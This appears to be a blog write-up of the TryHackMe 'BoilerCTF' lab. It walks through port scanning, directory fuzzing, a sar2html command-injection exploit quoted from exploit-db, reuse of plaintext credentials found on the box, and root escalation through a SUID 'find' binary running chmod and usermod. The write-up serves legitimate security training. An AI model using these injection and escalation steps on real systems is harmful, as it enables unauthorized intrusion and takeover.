5 December 2022

Pentesting Fun Stuff

following the cyber security path…

BoilerCTF

Another room from TryHackMe and it’s rated as intermediate. Let’s start by running a port scan.

Enumeration

root@cyberspace:~/thm/boilerctf# nmap -T4 -sS -sV -sC -oN nmap/portscan -p- boilerctf.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-26 22:41 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.16 seconds

Host down…..Let’s see if I can ping the machine.

root@cyberspace:~/thm/boilerctf# ping boilerctf.thm 
PING boilerctf.thm (10.10.238.14) 56(84) bytes of data.
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=1 ttl=63 time=38.2 ms
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=2 ttl=63 time=41.3 ms
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=3 ttl=63 time=47.6 ms
64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=4 ttl=63 time=38.8 ms

Yes I can. For those who wonder why I ping boilerctf.thm…….this is because I get an hour for a room at TryHackMe. If I run out of time or restart the room I get another IP address to attack. When I add the current IP address to /etc/hosts I can use the domain name instead of remember the IP address with every change.

But because I can ping the machine, I run the port scan again, but this time I add the option -Pn, which tells nmap to skip host discovery and treat all hosts as online.

root@cyberspace:~/thm/boilerctf# nmap -T4 -sS -sV -sC -Pn -oN nmap/portscan -p- boilerctf.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-26 22:42 CEST
Nmap scan report for boilerctf.thm (10.10.238.14)
Host is up (0.049s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.2.111
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.21 seconds

With this option active I get a better result from nmap. The following ports are open:

  • 21 | FTP (vsftpd version 3.0.3)
  • 80 | HTTP (Apache version 2.4.18 for Ubuntu)
  • 10000 | HTTP (MiniServ version 1.930)
  • 55007 | SSH (OpenSSH version 7.2p2)

FTP

From the nmap scan I can see that anonymous login is enabled on this FTP server. So let’s see if there is something useful to be found.

root@cyberspace:~/thm/boilerctf/ftp# ftp -p boilerctf.thm 
Connected to boilerctf.thm.
220 (vsFTPd 3.0.3)
Name (boilerctf.thm:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
227 Entering Passive Mode (10,10,238,14,161,127).
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22 12:05 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22 12:05 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21 15:42 .info.txt
226 Directory send OK.

There is a file with the extension txt. If I only used the command ls or dir, I wouldn’t have found anything, because the file is marked as hidden (there is a dot in front of its filename). Also I used the -p option to activate passive ftp. This way the client (me) is making all the requests and is initiating the connections instead of active FTP where the server tries to sent data via port 20.

ftp> get .info.txt
local: .info.txt remote: .info.txt
227 Entering Passive Mode (10,10,238,14,158,87).
150 Opening BINARY mode data connection for .info.txt (74 bytes).
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
74 bytes received in 0.00 secs (16.6090 kB/s)
ftp> bye
221 Goodbye.

I downloaded the file. Now to see what’s in it.

root@cyberspace:~/thm/boilerctf/ftp# cat .info.txt 
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

My first guess is some kind of rotation. It looks like there are some dots to end the sentence, a colon and a exclamation mark. There is a nifty site where you can try to use a frequency analysis attack on this sequence, which is called CyberChef.

My first guess was correct, because when I choose ROT13 I get a readable string: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

No real info, so on to the next service.

Webserver

When directing my browser to the site I get a default Apache page. From the nmap scan I know there is a robots.txt file.

User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

And this is why I like CTF based challenges. Is this a rabbit hole or a puzzle that needs to be solved. While wrapping my head around this string, I run a webfuzzer in the background. There are many tools for this like Gobuster, Dirb, Dirbuster and many more. I like DirSearch a lot. This tool doesn’t come by default with Kali and if you want to give it a try, you can find it on github.

root@cyberspace:~/TryHackMe/boiler# dirsearch -u http://boilerctf.thm -e php -f -x 400,403

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-09-03_10-39-49.log

Target: http://boilerctf.thm

[10:39:49] Starting: 
[10:40:54] 200 -   12KB - /joomla/
[10:40:54] 200 -    5KB - /joomla/administrator/
[10:40:59] 200 -  626B  - /manual/

Task Completed

With this tool I used certain flags to help get a better result. The -u flag is a mandatory one as it defines the URL it needs to scan. The -e flag is for which extension to scan. This flag is also a mandatory one and it needs at least one extension. You can add more extensions by concatenating them with a comma. The -f flag is for forcing the used extensions with the chosen wordlist (the same as can be done with Dirbuster) and the -x flag, which is used to filter out HTTP response codes (400 being page not found and 403 being page is restricted – more on these codes can be found with Google). There is another flag which is very useful and that is the -w flag. This flag lets you choose the preferred wordlist. For more options you can always use the -h flag.

I can use the -r flag, which lets DirSearch do a recursive scan (which I don’t prefer), but instead I run another aimed scan on the /joomla/ folder.

root@cyberspace:~/TryHackMe/boiler# dirsearch -u http://boilerctf.thm/joomla/ -e php -f -x 400,403

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-09-03_11-18-07.log

Target: http://boilerctf.thm/joomla/

[11:18:08] Starting: 
[11:18:22] 200 -  168B  - /joomla/_files/
[11:18:23] 200 -    5KB - /joomla/_test/
[11:18:37] 200 -    5KB - /joomla/administrator/
[11:18:39] 200 -   31B  - /joomla/administrator/logs/
[11:18:39] 200 -    5KB - /joomla/administrator/index.php/
[11:18:39] 200 -    5KB - /joomla/administrator/index.php
[11:18:48] 200 -   31B  - /joomla/bin/
[11:18:50] 200 -    3KB - /joomla/build/
[11:18:51] 200 -   31B  - /joomla/cache/
[11:18:54] 200 -   31B  - /joomla/components/
[11:18:56] 200 -    0B  - /joomla/configuration.php/
[11:19:13] 200 -   31B  - /joomla/images/
[11:19:14] 200 -   31B  - /joomla/includes/
[11:19:15] 303 -    0B  - /joomla/index.php/login/
[11:19:15] 200 -   12KB - /joomla/index.php/
[11:19:16] 200 -   12KB - /joomla/index.php
[11:19:16] 200 -    6KB - /joomla/installation/
[11:19:18] 200 -   31B  - /joomla/language/
[11:19:20] 200 -   31B  - /joomla/libraries/
[11:19:24] 200 -   31B  - /joomla/media/
[11:19:26] 200 -   31B  - /joomla/modules/
[11:19:37] 200 -   31B  - /joomla/plugins/
[11:19:53] 200 -   31B  - /joomla/templates/
[11:19:54] 200 -    2KB - /joomla/tests/
[11:19:55] 200 -   31B  - /joomla/tmp/

Task Completed

The first 2 hits are a bit off. When curling them I get some base64 encoded text.

root@cyberspace:/opt/tools/cmsmap# curl -s http://boilerctf.thm/joomla/_files/
<!DOCTYPE html>
<html>
	<head>
		<title>Woops</title>
	</head>
	<body>
		<div align=center><h1 style=color:red>VjJodmNITnBaU0JrWVdsemVRbz0K</h1></div>
	</body>
</html>

To decode base64 you can use some online tools or use the tools available on Kali.

root@cyberspace:/opt/tools/cmsmap# echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d
V2hvcHNpZSBkYWlzeQo=

More base64. One more time by hand and if there is more, I’ll try a loop.

root@cyberspace:/opt/tools/cmsmap# echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d | base64 -d
Whopsie daisy

Guess this was it. But it looks like another rabbit hole. The other folder which seemed a bit off was the folder /_test/. When directing my browser to that folder I get an interesting response. On this page runs software called sar2html. Sar2html is a Web-based front end for performance monitoring. It converts sar binary data to graphical format. The last update was performed in 2013. When looking at the offline version of exploit database I can see there is a remote code execution (RCE) vulnerability.

root@cyberspace:~/TryHackMe/boiler# searchsploit sar2html
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Sar2HTML 3.2.1 - Remote Command Execution                                                                                                          | exploits/php/webapps/47204.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

That’s not that hard to test.

This exploit seems to work.

With the command cat I can read the file called log.txt

 

Looks like credentials. I know from the nmap scan that an SSH server is running on port 55007.

root@cyberspace:~/TryHackMe/boiler# ssh basterd@boilerctf.thm -p 55007
The authenticity of host '[boilerctf.thm]:55007 ([10.10.161.72]:55007)' can't be established.
ECDSA key fingerprint is SHA256:mvrEiZlb4jqadxXJccZYZkCL/DHElLVQ74eKaSKZiRk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[boilerctf.thm]:55007,[10.10.161.72]:55007' (ECDSA) to the list of known hosts.
basterd@boilerctf.thm's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

8 packages can be updated.
8 updates are security updates.


Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199
$ id
uid=1001(basterd) gid=1001(basterd) groups=1001(basterd)

Some basic enumeration starts in the home folder of the compromised user and that’s where I find another set of credentials.

basterd@Vulnerable:~$ cat backup.sh 
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
	     echo "Begining copy of" $i  >> $LOG
	     scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
	     echo $i "completed" >> $LOG
		
		if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
		    rm $SOURCE/$i
		    echo $i "removed" >> $LOG
		    echo "####################" >> $LOG
				else
					echo "Copy not complete" >> $LOG
					exit 0
		fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi

Changing user.

basterd@Vulnerable:~$ su stoner
Password: 
stoner@Vulnerable:/home/basterd$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Does this user have sudo rights?

stoner@Vulnerable:/home/basterd$ sudo -l
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa

And another red haring. Back to his root folder.

stoner@Vulnerable:~$ ls -lah
total 16K
drwxr-x--- 3 stoner stoner 4.0K Aug 22 16:25 .
drwxr-xr-x 4 root   root   4.0K Aug 22 10:42 ..
drwxrwxr-x 2 stoner stoner 4.0K Aug 22 16:05 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21 18:05 .secret
stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.

Let’s see what is listening.

stoner@Vulnerable:~$ netstat -plant
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:55007           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      -               
tcp        0    476 10.10.161.72:55007      10.8.2.111:59528        ESTABLISHED -               
tcp6       0      0 :::21                   :::*                    LISTEN      -               
tcp6       0      0 :::55007                :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -

Looks like a mySQL server is running locally. But when I try to gain access it denies every try. No go here. From earlier enumeration I saw my current user has LXD rights. This could be a way to escalate your privileges, but in this case it looks like a rabbit hole.

Escalation of Privilege

One of the things you need to look at during system enumeration is files with the SUID bit set. What is the SUID bit?

SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it.

To find files with the SUID bit set, you can run the following command:

stoner@Vulnerable:~$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 38900 Mar 26 21:29 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26492 May 15 23:43 /bin/umount
-rwsr-xr-x 1 root root 34812 May 15 23:43 /bin/mount
-rwsr-xr-x 1 root root 43316 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 38932 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 13960 Mar 27 16:39 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root www-data 13692 Apr  3 20:55 /usr/lib/apache2/suexec-custom
-rwsr-xr-- 1 root www-data 13692 Apr  3 20:55 /usr/lib/apache2/suexec-pristine
-rwsr-xr-- 1 root messagebus 46436 Jun 10 22:45 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 513528 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 36288 Mar 26 21:29 /usr/bin/newgidmap
-r-sr-xr-x 1 root root 232196 Feb  8  2016 /usr/bin/find
-rwsr-sr-x 1 daemon daemon 50748 Jan 15  2016 /usr/bin/at
-rwsr-xr-x 1 root root 39560 Mar 26 21:29 /usr/bin/chsh
-rwsr-xr-x 1 root root 74280 Mar 26 21:29 /usr/bin/chfn
-rwsr-xr-x 1 root root 53128 Mar 26 21:29 /usr/bin/passwd
-rwsr-xr-x 1 root root 34680 Mar 26 21:29 /usr/bin/newgrp
-rwsr-xr-x 1 root root 159852 Jun 11 01:53 /usr/bin/sudo
-rwsr-xr-x 1 root root 18216 Mar 27 16:39 /usr/bin/pkexec
-rwsr-xr-x 1 root root 78012 Mar 26 21:29 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 36288 Mar 26 21:29 /usr/bin/newuidmap

With this command I used the find command to search for files recursively from the root folder and so on. Next I used the -perm flag to filter on a specific permission setting. In this case /4000 which is the numerical representation of the SUID bit enabled. Because I only want files, I used the -type f flag and the last flag I used is -exec, which let’s me execute a command with the findings from find in an array. In this case I used ls -ld to show the owner of the found files and the date of creation (which always is a good indicator which file was tempered with or created for the purpose of the challenge. Finally I ended with 2>/dev/null, which redirects all stderr (errors) to /dev/null and destroys them instead of showing them on screen and polluting my results.

In the list of files there is an interesting on, namely the command find itself. The command find has, like I showed above, an -exec flag where you can execute commands. Because the command has the SUID of root set, I can execute commands as root. Let’s test this.

stoner@Vulnerable:~$ find . -exec touch test.txt \;
stoner@Vulnerable:~$ ls -lah
total 20K
drwxr-x--- 4 stoner stoner 4.0K Sep  5 15:13 .
drwxr-xr-x 4 root   root   4.0K Aug 22 10:42 ..
drwx------ 2 stoner stoner 4.0K Sep  5 14:41 .cache
drwxrwxr-x 2 stoner stoner 4.0K Aug 22 16:05 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21 18:05 .secret
-rw-rw-r-- 1 root   stoner    0 Sep  5 15:13 test.txt

In this example I created a file through the exec flag of find and it created a file with as owner root and group stoner. I can do several things with this, but as I want access to the /root folder, I’m going to give myself better access.

stoner@Vulnerable:~$ find . -exec chmod -R 777 /root \;
stoner@Vulnerable:~$ cd /root
stoner@Vulnerable:/root$ ls -lah
total 12K
drwxrwxrwx  2 root root 4.0K Aug 22 12:25 .
drwxr-xr-x 22 root root 4.0K Aug 22 12:22 ..
-rwxrwxrwx  1 root root   29 Aug 21 19:25 root.txt
stoner@Vulnerable:/root$ cat root.txt
It wasn't that hard, was it?

Here I changed the folder /root to rwxrwxrwx (777) so everyone can open the files and folders in it.

Another way of getting access to folder /root is by adding yourself to the sudo group and then escalating to root.

stoner@Vulnerable:/root$ find . -exec usermod -aG sudo stoner \;
stoner@Vulnerable:/root$ su stoner
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

stoner@Vulnerable:/root$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
stoner@Vulnerable:/root$ sudo -l
User stoner may run the following commands on Vulnerable:
    (ALL : ALL) ALL
    (root) NOPASSWD: /NotThisTime/MessinWithYa
stoner@Vulnerable:/root$ sudo su -
[sudo] password for stoner: 
root@Vulnerable:~#

One thing to remember is that I loaded my bash shell again by executing the command su stoner after I was added to the sudo group. Without this step it wouldn’t work as the environment of the current bash shell wasn’t loaded properly. After that I used sudo to jump to user root and because I had sudo rights to act as root, there were no restrictions to stop me.

And there you have it. A really fun CTF based challenge to test your skills and learn some new things.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.